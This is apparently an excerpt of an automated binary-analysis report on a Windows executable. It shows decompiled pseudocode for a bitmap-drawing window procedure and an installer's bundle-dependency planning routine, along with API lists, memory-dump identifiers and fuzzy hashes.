                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset_strlen$_strcat$_sscanf_vscan_fn
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3056589307-0
                                                                                                                                                                  • Opcode ID: 403152bf92db43274024c9a4f77463d3bbea5a1632cdc500d382b8df9f3c8fe4
                                                                                                                                                                  • Instruction ID: 4b51f2b05251f5ad84218d7a5ee60ac0fbdcfae77a21dec9d6b54221d6e01b8d
                                                                                                                                                                  • Opcode Fuzzy Hash: 403152bf92db43274024c9a4f77463d3bbea5a1632cdc500d382b8df9f3c8fe4
                                                                                                                                                                  • Instruction Fuzzy Hash: 82912BF9E00209EFDB04CFA4D981AEFB7B5EF48344F104568E905AB345E635EA14CBA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0041737C(void** _a4, int _a8, int _a12, long _a16) {
                                                                                                                                                                  				void* _t16;
                                                                                                                                                                  				void* _t19;
                                                                                                                                                                  				long _t28;
                                                                                                                                                                  				struct HDC__* _t32;
                                                                                                                                                                  				void* _t35;
                                                                                                                                                                  				void* _t36;
                                                                                                                                                                  				void* _t38;
                                                                                                                                                                  				void* _t39;
                                                                                                                                                                  				struct HWND__* _t41;
                                                                                                                                                                  				void** _t43;
                                                                                                                                                                  				long _t45;
                                                                                                                                                                  
                                                                                                                                                                  				_t41 = _a4;
                                                                                                                                                                  				_t43 = GetWindowLongW(_t41, 0xffffffeb);
                                                                                                                                                                  				_t16 = 2;
                                                                                                                                                                  				_a4 = _t43;
                                                                                                                                                                  				_t35 = _a8 - _t16;
                                                                                                                                                                  				if(_t35 == 0) {
                                                                                                                                                                  					PostQuitMessage(0);
                                                                                                                                                                  					return 0;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t36 = _t35 - 0x12;
                                                                                                                                                                  				if(_t36 == 0) {
                                                                                                                                                                  					_t32 = CreateCompatibleDC(_a12);
                                                                                                                                                                  					_t19 = SelectObject(_t32,  *_t43);
                                                                                                                                                                  					StretchBlt(_a12, 0, 0, _a4[3], _a4[4], _t32, 0, 0,  *(_t20 + 0xc),  *(_t20 + 0x10), 0xcc0020);
                                                                                                                                                                  					SelectObject(_t32, _t19);
                                                                                                                                                                  					DeleteDC(_t32);
                                                                                                                                                                  					return 1;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t45 = _a16;
                                                                                                                                                                  				_t38 = _t36 - 0x6d;
                                                                                                                                                                  				if(_t38 == 0) {
                                                                                                                                                                  					SetWindowLongW(_t41, 0xffffffeb,  *_t45);
                                                                                                                                                                  					L8:
                                                                                                                                                                  					return DefWindowProcW(_t41, _a8, _a12, _t45);
                                                                                                                                                                  				}
                                                                                                                                                                  				_t39 = _t38 - 1;
                                                                                                                                                                  				if(_t39 == 0) {
                                                                                                                                                                  					_t28 = DefWindowProcW(_t41, 0x82, _a12, _t45);
                                                                                                                                                                  					SetWindowLongW(_t41, 0xffffffeb, 0);
                                                                                                                                                                  					return _t28;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_t39 != _t16) {
                                                                                                                                                                  					goto L8;
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t16;
                                                                                                                                                                  			}















                                                                                                                                                                  APIs
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00417387
                                                                                                                                                                  • DefWindowProcW.USER32(?,00000082,?,?), ref: 004173C3
                                                                                                                                                                  • SetWindowLongW.USER32 ref: 004173D0
                                                                                                                                                                  • SetWindowLongW.USER32 ref: 004173DF
                                                                                                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 004173ED
                                                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 004173F9
                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041740A
                                                                                                                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041742C
                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00417434
                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00417437
                                                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 00417445
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Long$ObjectProcSelect$CompatibleCreateDeleteMessagePostQuitStretch
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 409979828-0
                                                                                                                                                                  • Opcode ID: 640383b95517aa4f642cd817275df925215976194df71561c2fd0b8f14f38a61
                                                                                                                                                                  • Instruction ID: d478885b45acd630aaf25a92bd141296722ee0d303334c6fe2100d93c51215e4
                                                                                                                                                                  • Opcode Fuzzy Hash: 640383b95517aa4f642cd817275df925215976194df71561c2fd0b8f14f38a61
                                                                                                                                                                  • Instruction Fuzzy Hash: 1E21FF32104218BFCB145F64DC4CEBB3FB8EF49720B05952AFB22861B0D7308840EBA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                                                  			E0040D4B9(signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int* _a24) {
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				int _v12;
                                                                                                                                                                  				char _v16;
                                                                                                                                                                  				int _v20;
                                                                                                                                                                  				intOrPtr* _v24;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				int _t107;
                                                                                                                                                                  				short* _t109;
                                                                                                                                                                  				signed int _t110;
                                                                                                                                                                  				signed int _t111;
                                                                                                                                                                  				intOrPtr* _t119;
                                                                                                                                                                  				signed int _t126;
                                                                                                                                                                  				short* _t127;
                                                                                                                                                                  				signed int _t131;
                                                                                                                                                                  				signed int _t132;
                                                                                                                                                                  				signed int _t139;
                                                                                                                                                                  				intOrPtr* _t147;
                                                                                                                                                                  				signed int* _t148;
                                                                                                                                                                  				signed int _t149;
                                                                                                                                                                  				intOrPtr _t152;
                                                                                                                                                                  				signed int _t154;
                                                                                                                                                                  				signed int* _t157;
                                                                                                                                                                  				signed int _t159;
                                                                                                                                                                  				signed int _t160;
                                                                                                                                                                  				signed int _t163;
                                                                                                                                                                  				signed int _t164;
                                                                                                                                                                  				int _t165;
                                                                                                                                                                  				signed int _t166;
                                                                                                                                                                  				void* _t167;
                                                                                                                                                                  
                                                                                                                                                                  				_t147 = _a4;
                                                                                                                                                                  				_t163 = _a8;
                                                                                                                                                                  				_t107 = 1;
                                                                                                                                                                  				 *((intOrPtr*)(_t147 + 0x10)) = 1;
                                                                                                                                                                  				_t164 = 0;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				if( *((intOrPtr*)(_t163 + 8)) == 0 && _a12 != 4) {
                                                                                                                                                                  					_t107 = 0;
                                                                                                                                                                  				}
                                                                                                                                                                  				 *((intOrPtr*)(_t147 + 0x18)) = _t107;
                                                                                                                                                                  				 *(_t147 + 0x1c) = 0;
                                                                                                                                                                  				_t148 =  *(_t163 + 0x40);
                                                                                                                                                                  				if(_t148 != 0) {
                                                                                                                                                                  					__eflags =  *_t148;
                                                                                                                                                                  					_t109 =  !=  ? _t148 : 0;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t109 =  *(_t163 + 0xc);
                                                                                                                                                                  				}
                                                                                                                                                                  				_a4 = _t109;
                                                                                                                                                                  				if( *_t147 != 3) {
                                                                                                                                                                  					__eflags =  *(_t163 + 0x28);
                                                                                                                                                                  					if(__eflags != 0) {
                                                                                                                                                                  						L43:
                                                                                                                                                                  						_v20 = 1;
                                                                                                                                                                  						L44:
                                                                                                                                                                  						_t110 = E004369F6(_t148, _t163, __eflags,  *((intOrPtr*)(_t163 + 0x54)), 0);
                                                                                                                                                                  						__eflags = _t110;
                                                                                                                                                                  						if(_t110 == 0) {
                                                                                                                                                                  							L47:
                                                                                                                                                                  							 *(_t147 + 0x14) =  *(_t147 + 0x14) | 0x00000003;
                                                                                                                                                                  							L50:
                                                                                                                                                                  							 *(_t147 + 0x14) =  *(_t147 + 0x14) | 0x00000004;
                                                                                                                                                                  							_t149 = 0;
                                                                                                                                                                  							 *(_t147 + 0x38) = 1;
                                                                                                                                                                  							_a20 = 0;
                                                                                                                                                                  							__eflags =  *(_t163 + 0xb8);
                                                                                                                                                                  							if( *(_t163 + 0xb8) <= 0) {
                                                                                                                                                                  								L60:
                                                                                                                                                                  								_t111 = _a4;
                                                                                                                                                                  								__eflags = _t111;
                                                                                                                                                                  								if(_t111 == 0) {
                                                                                                                                                                  									goto L67;
                                                                                                                                                                  								}
                                                                                                                                                                  								__eflags =  *(_t163 + 0x40);
                                                                                                                                                                  								if( *(_t163 + 0x40) != 0) {
                                                                                                                                                                  									L63:
                                                                                                                                                                  									__eflags = E0041E9E9(_t163, _t111);
                                                                                                                                                                  									if(__eflags != 0) {
                                                                                                                                                                  										goto L67;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t164 = E0040BC29(__eflags, _t147, 1, _a4,  *(_t163 + 0xc));
                                                                                                                                                                  									__eflags = _t164;
                                                                                                                                                                  									if(_t164 >= 0) {
                                                                                                                                                                  										goto L67;
                                                                                                                                                                  									}
                                                                                                                                                                  									_push("Failed to add registration action for self dependent.");
                                                                                                                                                                  									goto L66;
                                                                                                                                                                  								}
                                                                                                                                                                  								__eflags = _v20;
                                                                                                                                                                  								if(_v20 != 0) {
                                                                                                                                                                  									goto L67;
                                                                                                                                                                  								}
                                                                                                                                                                  								goto L63;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t157 = 0;
                                                                                                                                                                  							__eflags = 0;
                                                                                                                                                                  							_a24 = 0;
                                                                                                                                                                  							do {
                                                                                                                                                                  								_t119 =  *((intOrPtr*)(_t163 + 0xb4)) + _t157;
                                                                                                                                                                  								_a16 = _t119;
                                                                                                                                                                  								__eflags =  *_t119 - 5;
                                                                                                                                                                  								if( *_t119 != 5) {
                                                                                                                                                                  									goto L59;
                                                                                                                                                                  								}
                                                                                                                                                                  								_a8 = _a8 & 0x00000000;
                                                                                                                                                                  								__eflags =  *(_t119 + 0xa0);
                                                                                                                                                                  								if( *(_t119 + 0xa0) <= 0) {
                                                                                                                                                                  									goto L59;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t152 = 0;
                                                                                                                                                                  								__eflags = 0;
                                                                                                                                                                  								_a12 = 0;
                                                                                                                                                                  								do {
                                                                                                                                                                  									_v24 =  *((intOrPtr*)(_t119 + 0x9c)) + _t152;
                                                                                                                                                                  									__eflags = E0041E9E9(_t163,  *( *((intOrPtr*)(_t119 + 0x9c)) + _t152));
                                                                                                                                                                  									if(__eflags != 0) {
                                                                                                                                                                  										goto L57;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t164 = E0040BC29(__eflags, _t147, 1,  *_v24,  *((intOrPtr*)(_a16 + 0x18)));
                                                                                                                                                                  									__eflags = _t164;
                                                                                                                                                                  									if(_t164 < 0) {
                                                                                                                                                                  										_push("Failed to add registration action for dependent related bundle.");
                                                                                                                                                                  										goto L66;
                                                                                                                                                                  									}
                                                                                                                                                                  									L57:
                                                                                                                                                                  									_t119 = _a16;
                                                                                                                                                                  									_t159 = _a8 + 1;
                                                                                                                                                                  									_t152 = _a12 + 0x10;
                                                                                                                                                                  									_a8 = _t159;
                                                                                                                                                                  									_a12 = _t152;
                                                                                                                                                                  									__eflags = _t159 -  *(_t119 + 0xa0);
                                                                                                                                                                  								} while (_t159 <  *(_t119 + 0xa0));
                                                                                                                                                                  								_t149 = _a20;
                                                                                                                                                                  								_t157 = _a24;
                                                                                                                                                                  								L59:
                                                                                                                                                                  								_t149 = _t149 + 1;
                                                                                                                                                                  								_t157 = _t157 + 0xe8;
                                                                                                                                                                  								_a20 = _t149;
                                                                                                                                                                  								_a24 = _t157;
                                                                                                                                                                  								__eflags = _t149 -  *(_t163 + 0xb8);
                                                                                                                                                                  							} while (_t149 <  *(_t163 + 0xb8));
                                                                                                                                                                  							goto L60;
                                                                                                                                                                  						}
                                                                                                                                                                  						__eflags =  *_t147 - 6;
                                                                                                                                                                  						if( *_t147 != 6) {
                                                                                                                                                                  							goto L50;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t126 = E00413062();
                                                                                                                                                                  						__eflags = _t126;
                                                                                                                                                                  						if(_t126 != 0) {
                                                                                                                                                                  							__eflags =  *_t147 - 6;
                                                                                                                                                                  							if( *_t147 == 6) {
                                                                                                                                                                  								_t66 = _t147 + 0x14;
                                                                                                                                                                  								 *_t66 =  *(_t147 + 0x14) | 0x00000002;
                                                                                                                                                                  								__eflags =  *_t66;
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L50;
                                                                                                                                                                  						}
                                                                                                                                                                  						goto L47;
                                                                                                                                                                  					}
                                                                                                                                                                  					_v20 = 0;
                                                                                                                                                                  					__eflags =  *(_t163 + 0x30);
                                                                                                                                                                  					if(__eflags == 0) {
                                                                                                                                                                  						goto L44;
                                                                                                                                                                  					}
                                                                                                                                                                  					goto L43;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t127 =  *(_t163 + 0xbc);
                                                                                                                                                                  					_t165 = 2;
                                                                                                                                                                  					if(_t127 == 0 || CompareStringW(0, 1,  *(_t163 + 0xc), 0xffffffff, _t127, 0xffffffff) != _t165) {
                                                                                                                                                                  						_push( *(_t163 + 0xbc));
                                                                                                                                                                  						E00402003(_t165, 0xa00000d1,  *((intOrPtr*)(_t163 + 0x44)));
                                                                                                                                                                  						_t167 = _t167 + 0x10;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						 *(_t147 + 0x38) = _t165;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t164 = E00437EE1( &_v8, 5, 1);
                                                                                                                                                                  					if(_t164 >= 0) {
                                                                                                                                                                  						_t131 = _a4;
                                                                                                                                                                  						__eflags = _t131;
                                                                                                                                                                  						if(_t131 == 0) {
                                                                                                                                                                  							L19:
                                                                                                                                                                  							__eflags = _a16 - 2;
                                                                                                                                                                  							if(_a16 == 2) {
                                                                                                                                                                  								goto L67;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t132 = _a20;
                                                                                                                                                                  							_t166 = 0;
                                                                                                                                                                  							__eflags = _t132;
                                                                                                                                                                  							if(_t132 == 0) {
                                                                                                                                                                  								L25:
                                                                                                                                                                  								_t154 = _t166;
                                                                                                                                                                  								_a12 = _t154;
                                                                                                                                                                  								__eflags =  *(_t163 + 0xb8) - _t166;
                                                                                                                                                                  								if( *(_t163 + 0xb8) <= _t166) {
                                                                                                                                                                  									L34:
                                                                                                                                                                  									_t164 = E00438CE4(_t154,  *((intOrPtr*)(_t163 + 0x4c)),  *((intOrPtr*)(_t163 + 0x44)), _t166, _v8,  &_v16,  &_v12);
                                                                                                                                                                  									__eflags = _t164 - 0x80070002;
                                                                                                                                                                  									if(_t164 != 0x80070002) {
                                                                                                                                                                  										__eflags = _t164;
                                                                                                                                                                  										if(_t164 < 0) {
                                                                                                                                                                  											_push("Failed to check for remaining dependents during planning.");
                                                                                                                                                                  											goto L66;
                                                                                                                                                                  										}
                                                                                                                                                                  										__eflags = _v12;
                                                                                                                                                                  										if(_v12 != 0) {
                                                                                                                                                                  											 *(_t147 + 0x1c) = 1;
                                                                                                                                                                  											 *_a24 =  *_a24 & 0x00000000;
                                                                                                                                                                  											E00402003(2, 0xa00000d2, _v12);
                                                                                                                                                                  										}
                                                                                                                                                                  										goto L67;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t164 = 0;
                                                                                                                                                                  									goto L67;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t160 = _t166;
                                                                                                                                                                  								_a16 = _t166;
                                                                                                                                                                  								do {
                                                                                                                                                                  									_t139 =  *((intOrPtr*)(_t163 + 0xb4)) + _t160;
                                                                                                                                                                  									_a20 = _t139;
                                                                                                                                                                  									__eflags =  *_t139 - 5;
                                                                                                                                                                  									if( *_t139 != 5) {
                                                                                                                                                                  										goto L33;
                                                                                                                                                                  									}
                                                                                                                                                                  									_a4 = _t166;
                                                                                                                                                                  									__eflags =  *((intOrPtr*)(_t139 + 0xa0)) - _t166;
                                                                                                                                                                  									if( *((intOrPtr*)(_t139 + 0xa0)) <= _t166) {
                                                                                                                                                                  										goto L33;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t161 = _t166;
                                                                                                                                                                  									_a8 = _t166;
                                                                                                                                                                  									while(1) {
                                                                                                                                                                  										_t164 = E0041E934(_t154, _v8,  *((intOrPtr*)( *((intOrPtr*)(_t139 + 0x9c)) + _t161)));
                                                                                                                                                                  										__eflags = _t164;
                                                                                                                                                                  										if(_t164 < 0) {
                                                                                                                                                                  											break;
                                                                                                                                                                  										}
                                                                                                                                                                  										_t139 = _a20;
                                                                                                                                                                  										_t154 = _a4 + 1;
                                                                                                                                                                  										_t161 = _a8 + 0x10;
                                                                                                                                                                  										_a4 = _t154;
                                                                                                                                                                  										_a8 = _a8 + 0x10;
                                                                                                                                                                  										__eflags = _t154 -  *((intOrPtr*)(_t139 + 0xa0));
                                                                                                                                                                  										if(_t154 <  *((intOrPtr*)(_t139 + 0xa0))) {
                                                                                                                                                                  											continue;
                                                                                                                                                                  										}
                                                                                                                                                                  										_t154 = _a12;
                                                                                                                                                                  										_t160 = _a16;
                                                                                                                                                                  										_t166 = 0;
                                                                                                                                                                  										__eflags = 0;
                                                                                                                                                                  										goto L33;
                                                                                                                                                                  									}
                                                                                                                                                                  									_push("Failed to add dependent bundle provider key to ignore dependents.");
                                                                                                                                                                  									goto L66;
                                                                                                                                                                  									L33:
                                                                                                                                                                  									_t154 = _t154 + 1;
                                                                                                                                                                  									_t160 = _t160 + 0xe8;
                                                                                                                                                                  									_a12 = _t154;
                                                                                                                                                                  									_a16 = _t160;
                                                                                                                                                                  									__eflags = _t154 -  *(_t163 + 0xb8);
                                                                                                                                                                  								} while (_t154 <  *(_t163 + 0xb8));
                                                                                                                                                                  								goto L34;
                                                                                                                                                                  							}
                                                                                                                                                                  							__eflags =  *_t132;
                                                                                                                                                                  							if( *_t132 == 0) {
                                                                                                                                                                  								goto L25;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t164 = E0041E934(_t148, _v8, _t132);
                                                                                                                                                                  							__eflags = _t164;
                                                                                                                                                                  							if(_t164 >= 0) {
                                                                                                                                                                  								_t166 = 0;
                                                                                                                                                                  								__eflags = 0;
                                                                                                                                                                  								goto L25;
                                                                                                                                                                  							}
                                                                                                                                                                  							_push("Failed to add dependents ignored from command-line.");
                                                                                                                                                                  							goto L66;
                                                                                                                                                                  						}
                                                                                                                                                                  						__eflags = E0041E9E9(_t163, _t131);
                                                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                                                  							goto L19;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t164 = E0040BC29(__eflags, _t147, 2, _a4,  *(_t163 + 0xc));
                                                                                                                                                                  						__eflags = _t164;
                                                                                                                                                                  						if(_t164 >= 0) {
                                                                                                                                                                  							_t164 = E0041E934(_t148, _v8, _a4);
                                                                                                                                                                  							__eflags = _t164;
                                                                                                                                                                  							if(_t164 >= 0) {
                                                                                                                                                                  								goto L19;
                                                                                                                                                                  							}
                                                                                                                                                                  							_push("Failed to add self-dependent to ignore dependents.");
                                                                                                                                                                  							goto L66;
                                                                                                                                                                  						}
                                                                                                                                                                  						_push("Failed to allocate registration action.");
                                                                                                                                                                  						goto L66;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_push("Failed to create the string dictionary.");
                                                                                                                                                                  						L66:
                                                                                                                                                                  						_push(_t164);
                                                                                                                                                                  						E00430A57();
                                                                                                                                                                  						L67:
                                                                                                                                                                  						if(_v8 != 0) {
                                                                                                                                                                  							E0043800C(_t163, _v8);
                                                                                                                                                                  						}
                                                                                                                                                                  						if(_v16 != 0) {
                                                                                                                                                                  							E00438EA2(_v16, _v12);
                                                                                                                                                                  						}
                                                                                                                                                                  						return _t164;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  			}
































                                                                                                                                                                  0x0040d710
                                                                                                                                                                  0x0040d710
                                                                                                                                                                  0x0040d710
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d70e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d703
                                                                                                                                                                  0x0040d6db
                                                                                                                                                                  0x0040d6de
                                                                                                                                                                  0x0040d6e1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d50e
                                                                                                                                                                  0x0040d50e
                                                                                                                                                                  0x0040d516
                                                                                                                                                                  0x0040d519
                                                                                                                                                                  0x0040d535
                                                                                                                                                                  0x0040d544
                                                                                                                                                                  0x0040d549
                                                                                                                                                                  0x0040d530
                                                                                                                                                                  0x0040d530
                                                                                                                                                                  0x0040d530
                                                                                                                                                                  0x0040d559
                                                                                                                                                                  0x0040d55d
                                                                                                                                                                  0x0040d569
                                                                                                                                                                  0x0040d56c
                                                                                                                                                                  0x0040d56e
                                                                                                                                                                  0x0040d5b4
                                                                                                                                                                  0x0040d5b4
                                                                                                                                                                  0x0040d5b8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d5be
                                                                                                                                                                  0x0040d5c1
                                                                                                                                                                  0x0040d5c3
                                                                                                                                                                  0x0040d5c5
                                                                                                                                                                  0x0040d5e7
                                                                                                                                                                  0x0040d5e7
                                                                                                                                                                  0x0040d5e9
                                                                                                                                                                  0x0040d5ec
                                                                                                                                                                  0x0040d5f2
                                                                                                                                                                  0x0040d668
                                                                                                                                                                  0x0040d67f
                                                                                                                                                                  0x0040d681
                                                                                                                                                                  0x0040d687
                                                                                                                                                                  0x0040d69a
                                                                                                                                                                  0x0040d69c
                                                                                                                                                                  0x0040d6cc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d6cc
                                                                                                                                                                  0x0040d69e
                                                                                                                                                                  0x0040d6a2
                                                                                                                                                                  0x0040d6b3
                                                                                                                                                                  0x0040d6ba
                                                                                                                                                                  0x0040d6bf
                                                                                                                                                                  0x0040d6c4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d6a2
                                                                                                                                                                  0x0040d689
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d689
                                                                                                                                                                  0x0040d5f4
                                                                                                                                                                  0x0040d5f6
                                                                                                                                                                  0x0040d5f9
                                                                                                                                                                  0x0040d5ff
                                                                                                                                                                  0x0040d601
                                                                                                                                                                  0x0040d604
                                                                                                                                                                  0x0040d607
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d609
                                                                                                                                                                  0x0040d60c
                                                                                                                                                                  0x0040d612
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d614
                                                                                                                                                                  0x0040d616
                                                                                                                                                                  0x0040d619
                                                                                                                                                                  0x0040d62a
                                                                                                                                                                  0x0040d62c
                                                                                                                                                                  0x0040d62e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d636
                                                                                                                                                                  0x0040d639
                                                                                                                                                                  0x0040d63a
                                                                                                                                                                  0x0040d63d
                                                                                                                                                                  0x0040d640
                                                                                                                                                                  0x0040d643
                                                                                                                                                                  0x0040d649
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d64b
                                                                                                                                                                  0x0040d64e
                                                                                                                                                                  0x0040d651
                                                                                                                                                                  0x0040d651
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d651
                                                                                                                                                                  0x0040d690
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d653
                                                                                                                                                                  0x0040d653
                                                                                                                                                                  0x0040d654
                                                                                                                                                                  0x0040d65a
                                                                                                                                                                  0x0040d65d
                                                                                                                                                                  0x0040d660
                                                                                                                                                                  0x0040d660
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d5f9
                                                                                                                                                                  0x0040d5c7
                                                                                                                                                                  0x0040d5ca
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d5d5
                                                                                                                                                                  0x0040d5d7
                                                                                                                                                                  0x0040d5d9
                                                                                                                                                                  0x0040d5e5
                                                                                                                                                                  0x0040d5e5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d5e5
                                                                                                                                                                  0x0040d5db
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d5db
                                                                                                                                                                  0x0040d577
                                                                                                                                                                  0x0040d579
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d589
                                                                                                                                                                  0x0040d58b
                                                                                                                                                                  0x0040d58d
                                                                                                                                                                  0x0040d5a4
                                                                                                                                                                  0x0040d5a6
                                                                                                                                                                  0x0040d5a8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d5aa
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d5aa
                                                                                                                                                                  0x0040d58f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d55f
                                                                                                                                                                  0x0040d55f
                                                                                                                                                                  0x0040d7fc
                                                                                                                                                                  0x0040d7fc
                                                                                                                                                                  0x0040d7fd
                                                                                                                                                                  0x0040d804
                                                                                                                                                                  0x0040d808
                                                                                                                                                                  0x0040d80d
                                                                                                                                                                  0x0040d80d
                                                                                                                                                                  0x0040d816
                                                                                                                                                                  0x0040d81e
                                                                                                                                                                  0x0040d81e
                                                                                                                                                                  0x0040d829
                                                                                                                                                                  0x0040d829
                                                                                                                                                                  0x0040d55d

                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,00000000,000003D8,000000F8,00401414,0000001C,000003BC,00401414,00000088,000003D8), ref: 0040D526
                                                                                                                                                                    • Part of subcall function 0041E934: _wcstok_s.LIBCMT ref: 0041E98B
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to add registration action for dependent related bundle., xrefs: 0040D82C
                                                                                                                                                                  • Failed to allocate registration action., xrefs: 0040D58F
                                                                                                                                                                  • Failed to add dependent bundle provider key to ignore dependents., xrefs: 0040D690
                                                                                                                                                                  • Failed to add dependents ignored from command-line., xrefs: 0040D5DB
                                                                                                                                                                  • Failed to check for remaining dependents during planning., xrefs: 0040D6CC
                                                                                                                                                                  • Failed to add self-dependent to ignore dependents., xrefs: 0040D5AA
                                                                                                                                                                  • Failed to add registration action for self dependent., xrefs: 0040D7F7
                                                                                                                                                                  • Failed to create the string dictionary., xrefs: 0040D55F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString_wcstok_s
                                                                                                                                                                  • String ID: Failed to add dependent bundle provider key to ignore dependents.$Failed to add dependents ignored from command-line.$Failed to add registration action for dependent related bundle.$Failed to add registration action for self dependent.$Failed to add self-dependent to ignore dependents.$Failed to allocate registration action.$Failed to check for remaining dependents during planning.$Failed to create the string dictionary.
                                                                                                                                                                  • API String ID: 3211832249-2086987450
                                                                                                                                                                  • Opcode ID: 366cac60d26e291b0a2ca474d1c170624252b26210ad294aeaebd45d04011d41
                                                                                                                                                                  • Instruction ID: 3067b0948dbd99f72626e9a012b4f8fade437f4d009733a30f543e73a2686259
                                                                                                                                                                  • Opcode Fuzzy Hash: 366cac60d26e291b0a2ca474d1c170624252b26210ad294aeaebd45d04011d41
                                                                                                                                                                  • Instruction Fuzzy Hash: E1B1CE71E00215EBDF19DF95CC81BAABBA0BF44314F10813BF814AB291D778D994CB99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 85%
